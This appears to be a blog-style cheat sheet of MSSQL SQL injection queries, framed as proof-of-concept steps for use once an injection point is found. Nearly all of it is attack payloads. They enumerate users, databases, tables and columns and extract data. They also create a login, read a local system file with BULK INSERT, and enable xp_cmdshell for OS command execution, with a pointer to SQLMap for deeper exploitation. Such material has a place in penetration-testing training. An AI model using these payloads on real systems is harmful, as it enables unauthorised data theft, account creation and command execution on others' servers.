After finding the injection point and detecting the exact number of column we can use the following basic queries to show proof of concept for the vulnerability.

FunctionQueryRemarks
Database versionSELECT @@version
Host nameSELECT host_name()
Current DatabaseSELECT DB_NAME()
Current userSELECT system_user;
SELECT user;
SELECT user_name()
List UsersSELECT name from master..syslogins
List DatabasesSELECT name FROM master..sysdatabases;
SELECT DB_NAME(*)
* = 1,2,3….
Get Tables from current databaseSelect table_name FROM information_schema.tables;
Get Tables from other databaseSELECT name FROM other_database..sysobjects WHERE xtype = ‘U’–
Get column from current DB’s SELECT column_name FROM information_schema.columns WHERE table_name = ‘your_table_name’;
Get column from other DB’s tableSELECT other_database..syscolumns.name,TYPE_NAME(other_database..syscolumns.xtype) FROM other_database..syscolumns, other_database..sysobjects WHEREother_database..syscolumns.id=other_database..sysobjects.id AND other_database..sysobjects.name=’other_table’
Extract DataSELECT column_name FROM table_name
Extract Data From another databaseSELECT other_column_name FROM other_database..other_table
Create UserEXEC sp_addlogin ‘user’, ‘pass’; Privilege
Location of Database files
EXEC sp_helpdb master;
EXEC sp_helpdb pubs;
Local File AccessBULK INSERT mydata FROM ‘c:boot.ini’;
Command ExecutionEXEC sp_configure ‘xp_cmdshell’, 1; Privilege



If you want to do further exploitation like extracting data from the database or running OS shell you can use SQLMap tool.

Also Read: SQL Injection Explained From Scratch

2 COMMENTS

Leave a Reply